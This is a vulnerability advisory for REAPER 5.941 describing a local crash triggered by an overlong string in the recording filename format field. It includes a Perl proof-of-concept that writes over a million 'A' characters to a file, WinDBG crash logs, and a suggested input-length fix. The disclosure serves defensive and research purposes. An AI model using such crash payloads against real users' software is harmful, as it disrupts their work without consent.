Document Title:
===============
Reaper 5.941 - Pointer Vulnerability
Product & Service Introduction:
===============================
REAPER is a complete digital audio production application for computers, offering a full multitrack audio
and MIDI recording, editing, processing, mixing and mastering toolset.
(Copy of the Vendor Homepage: https://www.reaper.fm/)
Exploitation Technique:
=======================
Local
Platfom Tested:
===============
Windows 7
Technical Details & Description:
================================
A Pointer vulnerability is detected on Reaper v5.941 software. A local attacker can crash the running software (reaper.exe) through an incorrect read pointer.
This vulnerability allows an attacker to crash the software process after a combined application on a primary module.
Vulnerable Modules:
===================
[+] Options -> Preference > Recording > Input Name : `Filename format for recorded files`
Proof of Concept (PoC):
=======================
The vulnerability can be exploited by local attackers. For demonstration or reproduce ...
1. Launch Reaper.exe
2. Click Options -> Preference > Recording
3. Copy the AAAA...+ string from test.txt.txt to clipboard
4. Paste it the input `Filename format for recorded files` AAAA....+ string > click Wildcards and $track
5. Software Reaper will crash.
-- PoC Exploit --
#!/usr/bin/perl
my $Buff = "A" x 1218000;
open(MYFILE,'>>test.txt');
print MYFILE $Buff;
close(MYFILE);
print " POC Created by ZwX";
--- Debug Session Logs [WinDBG] ---
PROBLEM_CLASSES:
ID: [0n309]
Type: [@ACCESS_VIOLATION]
Class: Addendum
Scope: BUCKET_ID
Name: Omit
Data: Omit
PID: [Unspecified]
TID: [0xe2c]
Frame: [0] : unknown!unknown
ID: [0n281]
Type: [INVALID_POINTER_READ]
Class: Primary
Scope: BUCKET_ID
Name: Add
Data: Omit
PID: [Unspecified]
TID: [0xe2c]
Frame: [0] : unknown!unknown
ID: [0n292]
Type: [BAD_INSTRUCTION_PTR]
Class: Primary
Scope: DEFAULT_BUCKET_ID (Failure Bucket ID prefix)
BUCKET_ID
Name: Add
Data: Omit
PID: [0x1208]
TID: [0xe2c]
Frame: [0] : unknown!unknown
BUGCHECK_STR: APPLICATION_FAULT_BAD_INSTRUCTION_PTR_INVALID_POINTER_READ
PRIMARY_PROBLEM_CLASS: APPLICATION_FAULT
STACK_TEXT:
0012df24 008303dd reaper+0x4303dd
0012dfac 009aaec9 reaper+0x5aaec9
0012dff4 004ac104 reaper+0xac104
0012e018 009b404f reaper+0x5b404f
0012e034 009b3f09 reaper+0x5b3f09
0012e0ed 03000000 unknown!unknown+0x0
MODULE_NAME: reaper
IMAGE_NAME: reaper.exe
DEBUG_FLR_IMAGE_TIMESTAMP: 5b65abe3
STACK_COMMAND: .cxr 12dc40 ; kb ; dt ntdll!LdrpLastDllInitializer BaseDllName ; dt ntdll!LdrpFailureData ; ** Pseudo Context ** Pseudo ** Value: 5a228e0 ** ; kb
FAILURE_BUCKET_ID: BAD_INSTRUCTION_PTR_c0000005_reaper.exe!Unknown
BUCKET_ID: APPLICATION_FAULT_BAD_INSTRUCTION_PTR_INVALID_POINTER_READ_BAD_IP_reaper+4303dd
0:000> lmvm reaper
Browse full module list
start end module name
00400000 00dd7000 reaper C (no symbols)
Loaded symbol image file: C:\Program Files\REAPER\reaper.exe
Image path: C:\Program Files\REAPER\reaper.exe
Image name: reaper.exe
Browse all global symbols functions data
Timestamp: Sat Aug 4 06:36:35 2018 (5B65ABE3)
CheckSum: 00000000
ImageSize: 009D7000
File version: 5.9.4.0
Product version: 5.9.4.0
File flags: 0 (Mask 3F)
File OS: 40004 NT Win32
File type: 1.0 App
File date: 00000000.00000000
Translations: 0409.04b0
Information from resource tables:
CompanyName: Cockos Incorporated
ProductName: REAPER
InternalName: REAPER
OriginalFilename: reaper.exe
ProductVersion: 5.941
FileVersion: 5.941
PrivateBuild: 5.941
SpecialBuild: 5.941
FileDescription: REAPER
LegalCopyright: Copyright � 2005-2018
LegalTrademarks: REAPER is a registered trademark of Cockos Incorporated
Comments: REAPER is a registered trademark of Cockos Incorporated
Solution - Fix & Patch:
=======================
Restrict the number of characters allowed in the module entry to prevent the software from crashing.
Credits & Authors:
==================
Social: twitter.com/@ZwX2a
Programs: vulnerability-lab.com/show.php?user=ZwX - hackerone.com/zwx - www.openbugbounty.org/researchers/ZxX/
Contact : msk4@live.fr